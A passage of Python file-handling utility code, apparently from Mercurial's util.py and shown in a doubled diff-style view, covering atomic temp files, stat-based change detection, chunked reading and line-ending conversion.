2314 ifp = posixfile(name, b"rb")
2315 except IOError as inst:
2315 except IOError as inst:
2316 if inst.errno == errno.ENOENT:
2316 if inst.errno == errno.ENOENT:
2317 return temp
2317 return temp
2318 if not getattr(inst, 'filename', None):
2318 if not getattr(inst, 'filename', None):
2319 inst.filename = name
2319 inst.filename = name
2320 raise
2320 raise
2321 ofp = posixfile(temp, b"wb")
2321 ofp = posixfile(temp, b"wb")
2322 for chunk in filechunkiter(ifp):
2322 for chunk in filechunkiter(ifp):
2323 ofp.write(chunk)
2323 ofp.write(chunk)
2324 ifp.close()
2324 ifp.close()
2325 ofp.close()
2325 ofp.close()
2326 except: # re-raises
2326 except: # re-raises
2327 try:
2327 try:
2328 os.unlink(temp)
2328 os.unlink(temp)
2329 except OSError:
2329 except OSError:
2330 pass
2330 pass
2331 raise
2331 raise
2332 return temp
2332 return temp
2333
2333
2334
2334
2335 class filestat(object):
2335 class filestat(object):
2336 """help to exactly detect change of a file
2336 """help to exactly detect change of a file
2337
2337
2338 'stat' attribute is result of 'os.stat()' if specified 'path'
2338 'stat' attribute is result of 'os.stat()' if specified 'path'
2339 exists. Otherwise, it is None. This can avoid preparative
2339 exists. Otherwise, it is None. This can avoid preparative
2340 'exists()' examination on client side of this class.
2340 'exists()' examination on client side of this class.
2341 """
2341 """
2342
2342
2343 def __init__(self, stat):
2343 def __init__(self, stat):
2344 self.stat = stat
2344 self.stat = stat
2345
2345
2346 @classmethod
2346 @classmethod
2347 def frompath(cls, path):
2347 def frompath(cls, path):
2348 try:
2348 try:
2349 stat = os.stat(path)
2349 stat = os.stat(path)
2350 except OSError as err:
2350 except OSError as err:
2351 if err.errno != errno.ENOENT:
2351 if err.errno != errno.ENOENT:
2352 raise
2352 raise
2353 stat = None
2353 stat = None
2354 return cls(stat)
2354 return cls(stat)
2355
2355
2356 @classmethod
2356 @classmethod
2357 def fromfp(cls, fp):
2357 def fromfp(cls, fp):
2358 stat = os.fstat(fp.fileno())
2358 stat = os.fstat(fp.fileno())
2359 return cls(stat)
2359 return cls(stat)
2360
2360
2361 __hash__ = object.__hash__
2361 __hash__ = object.__hash__
2362
2362
2363 def __eq__(self, old):
2363 def __eq__(self, old):
2364 try:
2364 try:
2365 # if ambiguity between stat of new and old file is
2365 # if ambiguity between stat of new and old file is
2366 # avoided, comparison of size, ctime and mtime is enough
2366 # avoided, comparison of size, ctime and mtime is enough
2367 # to exactly detect change of a file regardless of platform
2367 # to exactly detect change of a file regardless of platform
2368 return (
2368 return (
2369 self.stat.st_size == old.stat.st_size
2369 self.stat.st_size == old.stat.st_size
2370 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2370 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2371 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2371 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2372 )
2372 )
2373 except AttributeError:
2373 except AttributeError:
2374 pass
2374 pass
2375 try:
2375 try:
2376 return self.stat is None and old.stat is None
2376 return self.stat is None and old.stat is None
2377 except AttributeError:
2377 except AttributeError:
2378 return False
2378 return False
2379
2379
2380 def isambig(self, old):
2380 def isambig(self, old):
2381 """Examine whether new (= self) stat is ambiguous against old one
2381 """Examine whether new (= self) stat is ambiguous against old one
2382
2382
2383 "S[N]" below means stat of a file at N-th change:
2383 "S[N]" below means stat of a file at N-th change:
2384
2384
2385 - S[n-1].ctime < S[n].ctime: can detect change of a file
2385 - S[n-1].ctime < S[n].ctime: can detect change of a file
2386 - S[n-1].ctime == S[n].ctime
2386 - S[n-1].ctime == S[n].ctime
2387 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2387 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2388 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2388 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2389 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2389 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2390 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2390 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2391
2391
2392 Case (*2) above means that a file was changed twice or more at
2392 Case (*2) above means that a file was changed twice or more at
2393 same time in sec (= S[n-1].ctime), and comparison of timestamp
2393 same time in sec (= S[n-1].ctime), and comparison of timestamp
2394 is ambiguous.
2394 is ambiguous.
2395
2395
2396 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2396 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2397 timestamp is ambiguous".
2397 timestamp is ambiguous".
2398
2398
2399 But advancing mtime only in case (*2) doesn't work as
2399 But advancing mtime only in case (*2) doesn't work as
2400 expected, because naturally advanced S[n].mtime in case (*1)
2400 expected, because naturally advanced S[n].mtime in case (*1)
2401 might be equal to manually advanced S[n-1 or earlier].mtime.
2401 might be equal to manually advanced S[n-1 or earlier].mtime.
2402
2402
2403 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2403 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2404 treated as ambiguous regardless of mtime, to avoid overlooking
2404 treated as ambiguous regardless of mtime, to avoid overlooking
2405 by confliction between such mtime.
2405 by confliction between such mtime.
2406
2406
2407 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2407 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2408 S[n].mtime", even if size of a file isn't changed.
2408 S[n].mtime", even if size of a file isn't changed.
2409 """
2409 """
2410 try:
2410 try:
2411 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2411 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2412 except AttributeError:
2412 except AttributeError:
2413 return False
2413 return False
2414
2414
2415 def avoidambig(self, path, old):
2415 def avoidambig(self, path, old):
2416 """Change file stat of specified path to avoid ambiguity
2416 """Change file stat of specified path to avoid ambiguity
2417
2417
2418 'old' should be previous filestat of 'path'.
2418 'old' should be previous filestat of 'path'.
2419
2419
2420 This skips avoiding ambiguity, if a process doesn't have
2420 This skips avoiding ambiguity, if a process doesn't have
2421 appropriate privileges for 'path'. This returns False in this
2421 appropriate privileges for 'path'. This returns False in this
2422 case.
2422 case.
2423
2423
2424 Otherwise, this returns True, as "ambiguity is avoided".
2424 Otherwise, this returns True, as "ambiguity is avoided".
2425 """
2425 """
2426 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2426 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2427 try:
2427 try:
2428 os.utime(path, (advanced, advanced))
2428 os.utime(path, (advanced, advanced))
2429 except OSError as inst:
2429 except OSError as inst:
2430 if inst.errno == errno.EPERM:
2430 if inst.errno == errno.EPERM:
2431 # utime() on the file created by another user causes EPERM,
2431 # utime() on the file created by another user causes EPERM,
2432 # if a process doesn't have appropriate privileges
2432 # if a process doesn't have appropriate privileges
2433 return False
2433 return False
2434 raise
2434 raise
2435 return True
2435 return True
2436
2436
2437 def __ne__(self, other):
2437 def __ne__(self, other):
2438 return not self == other
2438 return not self == other
2439
2439
2440
2440
2441 class atomictempfile(object):
2441 class atomictempfile(object):
2442 '''writable file object that atomically updates a file
2442 '''writable file object that atomically updates a file
2443
2443
2444 All writes will go to a temporary copy of the original file. Call
2444 All writes will go to a temporary copy of the original file. Call
2445 close() when you are done writing, and atomictempfile will rename
2445 close() when you are done writing, and atomictempfile will rename
2446 the temporary copy to the original name, making the changes
2446 the temporary copy to the original name, making the changes
2447 visible. If the object is destroyed without being closed, all your
2447 visible. If the object is destroyed without being closed, all your
2448 writes are discarded.
2448 writes are discarded.
2449
2449
2450 checkambig argument of constructor is used with filestat, and is
2450 checkambig argument of constructor is used with filestat, and is
2451 useful only if target file is guarded by any lock (e.g. repo.lock
2451 useful only if target file is guarded by any lock (e.g. repo.lock
2452 or repo.wlock).
2452 or repo.wlock).
2453 '''
2453 '''
2454
2454
2455 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2455 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2456 self.__name = name # permanent name
2456 self.__name = name # permanent name
2457 self._tempname = mktempcopy(
2457 self._tempname = mktempcopy(
2458 name,
2458 name,
2459 emptyok=(b'w' in mode),
2459 emptyok=(b'w' in mode),
2460 createmode=createmode,
2460 createmode=createmode,
2461 enforcewritable=(b'w' in mode),
2461 enforcewritable=(b'w' in mode),
2462 )
2462 )
2463
2463
2464 self._fp = posixfile(self._tempname, mode)
2464 self._fp = posixfile(self._tempname, mode)
2465 self._checkambig = checkambig
2465 self._checkambig = checkambig
2466
2466
2467 # delegated methods
2467 # delegated methods
2468 self.read = self._fp.read
2468 self.read = self._fp.read
2469 self.write = self._fp.write
2469 self.write = self._fp.write
2470 self.seek = self._fp.seek
2470 self.seek = self._fp.seek
2471 self.tell = self._fp.tell
2471 self.tell = self._fp.tell
2472 self.fileno = self._fp.fileno
2472 self.fileno = self._fp.fileno
2473
2473
2474 def close(self):
2474 def close(self):
2475 if not self._fp.closed:
2475 if not self._fp.closed:
2476 self._fp.close()
2476 self._fp.close()
2477 filename = localpath(self.__name)
2477 filename = localpath(self.__name)
2478 oldstat = self._checkambig and filestat.frompath(filename)
2478 oldstat = self._checkambig and filestat.frompath(filename)
2479 if oldstat and oldstat.stat:
2479 if oldstat and oldstat.stat:
2480 rename(self._tempname, filename)
2480 rename(self._tempname, filename)
2481 newstat = filestat.frompath(filename)
2481 newstat = filestat.frompath(filename)
2482 if newstat.isambig(oldstat):
2482 if newstat.isambig(oldstat):
2483 # stat of changed file is ambiguous to original one
2483 # stat of changed file is ambiguous to original one
2484 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2484 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2485 os.utime(filename, (advanced, advanced))
2485 os.utime(filename, (advanced, advanced))
2486 else:
2486 else:
2487 rename(self._tempname, filename)
2487 rename(self._tempname, filename)
2488
2488
2489 def discard(self):
2489 def discard(self):
2490 if not self._fp.closed:
2490 if not self._fp.closed:
2491 try:
2491 try:
2492 os.unlink(self._tempname)
2492 os.unlink(self._tempname)
2493 except OSError:
2493 except OSError:
2494 pass
2494 pass
2495 self._fp.close()
2495 self._fp.close()
2496
2496
2497 def __del__(self):
2497 def __del__(self):
2498 if safehasattr(self, '_fp'): # constructor actually did something
2498 if safehasattr(self, '_fp'): # constructor actually did something
2499 self.discard()
2499 self.discard()
2500
2500
2501 def __enter__(self):
2501 def __enter__(self):
2502 return self
2502 return self
2503
2503
2504 def __exit__(self, exctype, excvalue, traceback):
2504 def __exit__(self, exctype, excvalue, traceback):
2505 if exctype is not None:
2505 if exctype is not None:
2506 self.discard()
2506 self.discard()
2507 else:
2507 else:
2508 self.close()
2508 self.close()
2509
2509
2510
2510
2511 def unlinkpath(f, ignoremissing=False, rmdir=True):
2511 def unlinkpath(f, ignoremissing=False, rmdir=True):
2512 """unlink and remove the directory if it is empty"""
2512 """unlink and remove the directory if it is empty"""
2513 if ignoremissing:
2513 if ignoremissing:
2514 tryunlink(f)
2514 tryunlink(f)
2515 else:
2515 else:
2516 unlink(f)
2516 unlink(f)
2517 if rmdir:
2517 if rmdir:
2518 # try removing directories that might now be empty
2518 # try removing directories that might now be empty
2519 try:
2519 try:
2520 removedirs(os.path.dirname(f))
2520 removedirs(os.path.dirname(f))
2521 except OSError:
2521 except OSError:
2522 pass
2522 pass
2523
2523
2524
2524
2525 def tryunlink(f):
2525 def tryunlink(f):
2526 """Attempt to remove a file, ignoring ENOENT errors."""
2526 """Attempt to remove a file, ignoring ENOENT errors."""
2527 try:
2527 try:
2528 unlink(f)
2528 unlink(f)
2529 except OSError as e:
2529 except OSError as e:
2530 if e.errno != errno.ENOENT:
2530 if e.errno != errno.ENOENT:
2531 raise
2531 raise
2532
2532
2533
2533
2534 def makedirs(name, mode=None, notindexed=False):
2534 def makedirs(name, mode=None, notindexed=False):
2535 """recursive directory creation with parent mode inheritance
2535 """recursive directory creation with parent mode inheritance
2536
2536
2537 Newly created directories are marked as "not to be indexed by
2537 Newly created directories are marked as "not to be indexed by
2538 the content indexing service", if ``notindexed`` is specified
2538 the content indexing service", if ``notindexed`` is specified
2539 for "write" mode access.
2539 for "write" mode access.
2540 """
2540 """
2541 try:
2541 try:
2542 makedir(name, notindexed)
2542 makedir(name, notindexed)
2543 except OSError as err:
2543 except OSError as err:
2544 if err.errno == errno.EEXIST:
2544 if err.errno == errno.EEXIST:
2545 return
2545 return
2546 if err.errno != errno.ENOENT or not name:
2546 if err.errno != errno.ENOENT or not name:
2547 raise
2547 raise
2548 parent = os.path.dirname(os.path.abspath(name))
2548 parent = os.path.dirname(os.path.abspath(name))
2549 if parent == name:
2549 if parent == name:
2550 raise
2550 raise
2551 makedirs(parent, mode, notindexed)
2551 makedirs(parent, mode, notindexed)
2552 try:
2552 try:
2553 makedir(name, notindexed)
2553 makedir(name, notindexed)
2554 except OSError as err:
2554 except OSError as err:
2555 # Catch EEXIST to handle races
2555 # Catch EEXIST to handle races
2556 if err.errno == errno.EEXIST:
2556 if err.errno == errno.EEXIST:
2557 return
2557 return
2558 raise
2558 raise
2559 if mode is not None:
2559 if mode is not None:
2560 os.chmod(name, mode)
2560 os.chmod(name, mode)
2561
2561
2562
2562
2563 def readfile(path):
2563 def readfile(path):
2564 with open(path, b'rb') as fp:
2564 with open(path, b'rb') as fp:
2565 return fp.read()
2565 return fp.read()
2566
2566
2567
2567
2568 def writefile(path, text):
2568 def writefile(path, text):
2569 with open(path, b'wb') as fp:
2569 with open(path, b'wb') as fp:
2570 fp.write(text)
2570 fp.write(text)
2571
2571
2572
2572
2573 def appendfile(path, text):
2573 def appendfile(path, text):
2574 with open(path, b'ab') as fp:
2574 with open(path, b'ab') as fp:
2575 fp.write(text)
2575 fp.write(text)
2576
2576
2577
2577
2578 class chunkbuffer(object):
2578 class chunkbuffer(object):
2579 """Allow arbitrary sized chunks of data to be efficiently read from an
2579 """Allow arbitrary sized chunks of data to be efficiently read from an
2580 iterator over chunks of arbitrary size."""
2580 iterator over chunks of arbitrary size."""
2581
2581
2582 def __init__(self, in_iter):
2582 def __init__(self, in_iter):
2583 """in_iter is the iterator that's iterating over the input chunks."""
2583 """in_iter is the iterator that's iterating over the input chunks."""
2584
2584
2585 def splitbig(chunks):
2585 def splitbig(chunks):
2586 for chunk in chunks:
2586 for chunk in chunks:
2587 if len(chunk) > 2 ** 20:
2587 if len(chunk) > 2 ** 20:
2588 pos = 0
2588 pos = 0
2589 while pos < len(chunk):
2589 while pos < len(chunk):
2590 end = pos + 2 ** 18
2590 end = pos + 2 ** 18
2591 yield chunk[pos:end]
2591 yield chunk[pos:end]
2592 pos = end
2592 pos = end
2593 else:
2593 else:
2594 yield chunk
2594 yield chunk
2595
2595
2596 self.iter = splitbig(in_iter)
2596 self.iter = splitbig(in_iter)
2597 self._queue = collections.deque()
2597 self._queue = collections.deque()
2598 self._chunkoffset = 0
2598 self._chunkoffset = 0
2599
2599
2600 def read(self, l=None):
2600 def read(self, l=None):
2601 """Read L bytes of data from the iterator of chunks of data.
2601 """Read L bytes of data from the iterator of chunks of data.
2602 Returns less than L bytes if the iterator runs dry.
2602 Returns less than L bytes if the iterator runs dry.
2603
2603
2604 If size parameter is omitted, read everything"""
2604 If size parameter is omitted, read everything"""
2605 if l is None:
2605 if l is None:
2606 return b''.join(self.iter)
2606 return b''.join(self.iter)
2607
2607
2608 left = l
2608 left = l
2609 buf = []
2609 buf = []
2610 queue = self._queue
2610 queue = self._queue
2611 while left > 0:
2611 while left > 0:
2612 # refill the queue
2612 # refill the queue
2613 if not queue:
2613 if not queue:
2614 target = 2 ** 18
2614 target = 2 ** 18
2615 for chunk in self.iter:
2615 for chunk in self.iter:
2616 queue.append(chunk)
2616 queue.append(chunk)
2617 target -= len(chunk)
2617 target -= len(chunk)
2618 if target <= 0:
2618 if target <= 0:
2619 break
2619 break
2620 if not queue:
2620 if not queue:
2621 break
2621 break
2622
2622
2623 # The easy way to do this would be to queue.popleft(), modify the
2623 # The easy way to do this would be to queue.popleft(), modify the
2624 # chunk (if necessary), then queue.appendleft(). However, for cases
2624 # chunk (if necessary), then queue.appendleft(). However, for cases
2625 # where we read partial chunk content, this incurs 2 dequeue
2625 # where we read partial chunk content, this incurs 2 dequeue
2626 # mutations and creates a new str for the remaining chunk in the
2626 # mutations and creates a new str for the remaining chunk in the
2627 # queue. Our code below avoids this overhead.
2627 # queue. Our code below avoids this overhead.
2628
2628
2629 chunk = queue[0]
2629 chunk = queue[0]
2630 chunkl = len(chunk)
2630 chunkl = len(chunk)
2631 offset = self._chunkoffset
2631 offset = self._chunkoffset
2632
2632
2633 # Use full chunk.
2633 # Use full chunk.
2634 if offset == 0 and left >= chunkl:
2634 if offset == 0 and left >= chunkl:
2635 left -= chunkl
2635 left -= chunkl
2636 queue.popleft()
2636 queue.popleft()
2637 buf.append(chunk)
2637 buf.append(chunk)
2638 # self._chunkoffset remains at 0.
2638 # self._chunkoffset remains at 0.
2639 continue
2639 continue
2640
2640
2641 chunkremaining = chunkl - offset
2641 chunkremaining = chunkl - offset
2642
2642
2643 # Use all of unconsumed part of chunk.
2643 # Use all of unconsumed part of chunk.
2644 if left >= chunkremaining:
2644 if left >= chunkremaining:
2645 left -= chunkremaining
2645 left -= chunkremaining
2646 queue.popleft()
2646 queue.popleft()
2647 # offset == 0 is enabled by block above, so this won't merely
2647 # offset == 0 is enabled by block above, so this won't merely
2648 # copy via ``chunk[0:]``.
2648 # copy via ``chunk[0:]``.
2649 buf.append(chunk[offset:])
2649 buf.append(chunk[offset:])
2650 self._chunkoffset = 0
2650 self._chunkoffset = 0
2651
2651
2652 # Partial chunk needed.
2652 # Partial chunk needed.
2653 else:
2653 else:
2654 buf.append(chunk[offset : offset + left])
2654 buf.append(chunk[offset : offset + left])
2655 self._chunkoffset += left
2655 self._chunkoffset += left
2656 left -= chunkremaining
2656 left -= chunkremaining
2657
2657
2658 return b''.join(buf)
2658 return b''.join(buf)
2659
2659
2660
2660
2661 def filechunkiter(f, size=131072, limit=None):
2661 def filechunkiter(f, size=131072, limit=None):
2662 """Create a generator that produces the data in the file size
2662 """Create a generator that produces the data in the file size
2663 (default 131072) bytes at a time, up to optional limit (default is
2663 (default 131072) bytes at a time, up to optional limit (default is
2664 to read all data). Chunks may be less than size bytes if the
2664 to read all data). Chunks may be less than size bytes if the
2665 chunk is the last chunk in the file, or the file is a socket or
2665 chunk is the last chunk in the file, or the file is a socket or
2666 some other type of file that sometimes reads less data than is
2666 some other type of file that sometimes reads less data than is
2667 requested."""
2667 requested."""
2668 assert size >= 0
2668 assert size >= 0
2669 assert limit is None or limit >= 0
2669 assert limit is None or limit >= 0
2670 while True:
2670 while True:
2671 if limit is None:
2671 if limit is None:
2672 nbytes = size
2672 nbytes = size
2673 else:
2673 else:
2674 nbytes = min(limit, size)
2674 nbytes = min(limit, size)
2675 s = nbytes and f.read(nbytes)
2675 s = nbytes and f.read(nbytes)
2676 if not s:
2676 if not s:
2677 break
2677 break
2678 if limit:
2678 if limit:
2679 limit -= len(s)
2679 limit -= len(s)
2680 yield s
2680 yield s
2681
2681
2682
2682
2683 class cappedreader(object):
2683 class cappedreader(object):
2684 """A file object proxy that allows reading up to N bytes.
2684 """A file object proxy that allows reading up to N bytes.
2685
2685
2686 Given a source file object, instances of this type allow reading up to
2686 Given a source file object, instances of this type allow reading up to
2687 N bytes from that source file object. Attempts to read past the allowed
2687 N bytes from that source file object. Attempts to read past the allowed
2688 limit are treated as EOF.
2688 limit are treated as EOF.
2689
2689
2690 It is assumed that I/O is not performed on the original file object
2690 It is assumed that I/O is not performed on the original file object
2691 in addition to I/O that is performed by this instance. If there is,
2691 in addition to I/O that is performed by this instance. If there is,
2692 state tracking will get out of sync and unexpected results will ensue.
2692 state tracking will get out of sync and unexpected results will ensue.
2693 """
2693 """
2694
2694
2695 def __init__(self, fh, limit):
2695 def __init__(self, fh, limit):
2696 """Allow reading up to <limit> bytes from <fh>."""
2696 """Allow reading up to <limit> bytes from <fh>."""
2697 self._fh = fh
2697 self._fh = fh
2698 self._left = limit
2698 self._left = limit
2699
2699
2700 def read(self, n=-1):
2700 def read(self, n=-1):
2701 if not self._left:
2701 if not self._left:
2702 return b''
2702 return b''
2703
2703
2704 if n < 0:
2704 if n < 0:
2705 n = self._left
2705 n = self._left
2706
2706
2707 data = self._fh.read(min(n, self._left))
2707 data = self._fh.read(min(n, self._left))
2708 self._left -= len(data)
2708 self._left -= len(data)
2709 assert self._left >= 0
2709 assert self._left >= 0
2710
2710
2711 return data
2711 return data
2712
2712
2713 def readinto(self, b):
2713 def readinto(self, b):
2714 res = self.read(len(b))
2714 res = self.read(len(b))
2715 if res is None:
2715 if res is None:
2716 return None
2716 return None
2717
2717
2718 b[0 : len(res)] = res
2718 b[0 : len(res)] = res
2719 return len(res)
2719 return len(res)
2720
2720
2721
2721
2722 def unitcountfn(*unittable):
2722 def unitcountfn(*unittable):
2723 '''return a function that renders a readable count of some quantity'''
2723 '''return a function that renders a readable count of some quantity'''
2724
2724
2725 def go(count):
2725 def go(count):
2726 for multiplier, divisor, format in unittable:
2726 for multiplier, divisor, format in unittable:
2727 if abs(count) >= divisor * multiplier:
2727 if abs(count) >= divisor * multiplier:
2728 return format % (count / float(divisor))
2728 return format % (count / float(divisor))
2729 return unittable[-1][2] % count
2729 return unittable[-1][2] % count
2730
2730
2731 return go
2731 return go
2732
2732
2733
2733
2734 def processlinerange(fromline, toline):
2734 def processlinerange(fromline, toline):
2735 """Check that linerange <fromline>:<toline> makes sense and return a
2735 """Check that linerange <fromline>:<toline> makes sense and return a
2736 0-based range.
2736 0-based range.
2737
2737
2738 >>> processlinerange(10, 20)
2738 >>> processlinerange(10, 20)
2739 (9, 20)
2739 (9, 20)
2740 >>> processlinerange(2, 1)
2740 >>> processlinerange(2, 1)
2741 Traceback (most recent call last):
2741 Traceback (most recent call last):
2742 ...
2742 ...
2743 ParseError: line range must be positive
2743 ParseError: line range must be positive
2744 >>> processlinerange(0, 5)
2744 >>> processlinerange(0, 5)
2745 Traceback (most recent call last):
2745 Traceback (most recent call last):
2746 ...
2746 ...
2747 ParseError: fromline must be strictly positive
2747 ParseError: fromline must be strictly positive
2748 """
2748 """
2749 if toline - fromline < 0:
2749 if toline - fromline < 0:
2750 raise error.ParseError(_(b"line range must be positive"))
2750 raise error.ParseError(_(b"line range must be positive"))
2751 if fromline < 1:
2751 if fromline < 1:
2752 raise error.ParseError(_(b"fromline must be strictly positive"))
2752 raise error.ParseError(_(b"fromline must be strictly positive"))
2753 return fromline - 1, toline
2753 return fromline - 1, toline
2754
2754
2755
2755
2756 bytecount = unitcountfn(
2756 bytecount = unitcountfn(
2757 (100, 1 << 30, _(b'%.0f GB')),
2757 (100, 1 << 30, _(b'%.0f GB')),
2758 (10, 1 << 30, _(b'%.1f GB')),
2758 (10, 1 << 30, _(b'%.1f GB')),
2759 (1, 1 << 30, _(b'%.2f GB')),
2759 (1, 1 << 30, _(b'%.2f GB')),
2760 (100, 1 << 20, _(b'%.0f MB')),
2760 (100, 1 << 20, _(b'%.0f MB')),
2761 (10, 1 << 20, _(b'%.1f MB')),
2761 (10, 1 << 20, _(b'%.1f MB')),
2762 (1, 1 << 20, _(b'%.2f MB')),
2762 (1, 1 << 20, _(b'%.2f MB')),
2763 (100, 1 << 10, _(b'%.0f KB')),
2763 (100, 1 << 10, _(b'%.0f KB')),
2764 (10, 1 << 10, _(b'%.1f KB')),
2764 (10, 1 << 10, _(b'%.1f KB')),
2765 (1, 1 << 10, _(b'%.2f KB')),
2765 (1, 1 << 10, _(b'%.2f KB')),
2766 (1, 1, _(b'%.0f bytes')),
2766 (1, 1, _(b'%.0f bytes')),
2767 )
2767 )
2768
2768
2769
2769
2770 class transformingwriter(object):
2770 class transformingwriter(object):
2771 """Writable file wrapper to transform data by function"""
2771 """Writable file wrapper to transform data by function"""
2772
2772
2773 def __init__(self, fp, encode):
2773 def __init__(self, fp, encode):
2774 self._fp = fp
2774 self._fp = fp
2775 self._encode = encode
2775 self._encode = encode
2776
2776
2777 def close(self):
2777 def close(self):
2778 self._fp.close()
2778 self._fp.close()
2779
2779
2780 def flush(self):
2780 def flush(self):
2781 self._fp.flush()
2781 self._fp.flush()
2782
2782
2783 def write(self, data):
2783 def write(self, data):
2784 return self._fp.write(self._encode(data))
2784 return self._fp.write(self._encode(data))
2785
2785
2786
2786
2787 # Matches a single EOL which can either be a CRLF where repeated CR
2787 # Matches a single EOL which can either be a CRLF where repeated CR
2788 # are removed or a LF. We do not care about old Macintosh files, so a
2788 # are removed or a LF. We do not care about old Macintosh files, so a
2789 # stray CR is an error.
2789 # stray CR is an error.
2790 _eolre = remod.compile(br'\r*\n')
2790 _eolre = remod.compile(br'\r*\n')
2791
2791
2792
2792
2793 def tolf(s):
2793 def tolf(s):
2794 return _eolre.sub(b'\n', s)
2794 return _eolre.sub(b'\n', s)
2795
2795
2796
2796
2797 def tocrlf(s):
2797 def tocrlf(s):
2798 return _eolre.sub(b'\r\n', s)
2798 return _eolre.sub(b'\r\n', s)
2799
2799
2800
2800
2801 def _crlfwriter(fp):
2801 def _crlfwriter(fp):
2802 return transformingwriter(fp, tocrlf)
2802 return transformingwriter(fp, tocrlf)
2803
2803
2804
2804
2805 if pycompat.oslinesep == b'\r\n':
2805 if pycompat.oslinesep == b'\r\n':
2806 tonativeeol = tocrlf
2806 tonativeeol = tocrlf
2807 fromnativeeol = tolf
2807 fromnativeeol = tolf
2808 nativeeolwriter = _crlfwriter
2808 nativeeolwriter = _crlfwriter
2809 else:
2809 else:
2810 tonativeeol = pycompat.identity
2810 tonativeeol = pycompat.identity
2811 fromnativeeol = pycompat.identity
2811 fromnativeeol = pycompat.identity
2812 nativeeolwriter = pycompat.identity
2812 nativeeolwriter = pycompat.identity
2813
2813
2814 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2814 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2815 3,
2815 3,
2816 0,
2816 0,
2817 ):
2817 ):
2818 # There is an issue in CPython that some IO methods do not handle EINTR
2818 # There is an issue in CPython that some IO methods do not handle EINTR
2819 # correctly. The following table shows what CPython version (and functions)
2819 # correctly. The following table shows what CPython version (and functions)
2820 # are affected (buggy: has the EINTR bug, okay: otherwise):
2820 # are affected (buggy: has the EINTR bug, okay: otherwise):
2821 #
2821 #
2822 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2822 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2823 # --------------------------------------------------
2823 # --------------------------------------------------
2824 # fp.__iter__ | buggy | buggy | okay
2824 # fp.__iter__ | buggy | buggy | okay
2825 # fp.read* | buggy | okay [1] | okay
2825 # fp.read* | buggy | okay [1] | okay
2826 #
2826 #
2827 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2827 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2828 #
2828 #
2829 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2829 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2830 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2830 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2831 #
2831 #
2832 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2832 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2833 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2833 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2834 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2834 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2835 # fp.__iter__ but not other fp.read* methods.
2835 # fp.__iter__ but not other fp.read* methods.
2836 #
2836 #
2837 # On modern systems like Linux, the "read" syscall cannot be interrupted
2837 # On modern systems like Linux, the "read" syscall cannot be interrupted
2838 # when reading "fast" files like on-disk files. So the EINTR issue only
2838 # when reading "fast" files like on-disk files. So the EINTR issue only
2839 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2839 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2840 # files approximately as "fast" files and use the fast (unsafe) code path,
2840 # files approximately as "fast" files and use the fast (unsafe) code path,
2841 # to minimize the performance impact.
2841 # to minimize the performance impact.
2842 if sys.version_info >= (2, 7, 4):
2842 if sys.version_info >= (2, 7, 4):
2843 # fp.readline deals with EINTR correctly, use it as a workaround.
2843 # fp.readline deals with EINTR correctly, use it as a workaround.
2844 def _safeiterfile(fp):
2844 def _safeiterfile(fp):
2845 return iter(fp.readline, b'')
2845 return iter(fp.readline, b'')
2846
2846
2847 else:
2847 else:
2848 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2848 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2849 # note: this may block longer than necessary because of bufsize.
2849 # note: this may block longer than necessary because of bufsize.
2850 def _safeiterfile(fp, bufsize=4096):
2850 def _safeiterfile(fp, bufsize=4096):
2851 fd = fp.fileno()
2851 fd = fp.fileno()
2852 line = b''
2852 line = b''
2853 while True:
2853 while True:
2854 try:
2854 try:
2855 buf = os.read(fd, bufsize)
2855 buf = os.read(fd, bufsize)
2856 except OSError as ex:
2856 except OSError as ex:
2857 # os.read only raises EINTR before any data is read
2857 # os.read only raises EINTR before any data is read
2858 if ex.errno == errno.EINTR:
2858 if ex.errno == errno.EINTR:
2859 continue
2859 continue
2860 else:
2860 else:
2861 raise
2861 raise
2862 line += buf
2862 line += buf
2863 if b'\n' in buf:
2863 if b'\n' in buf:
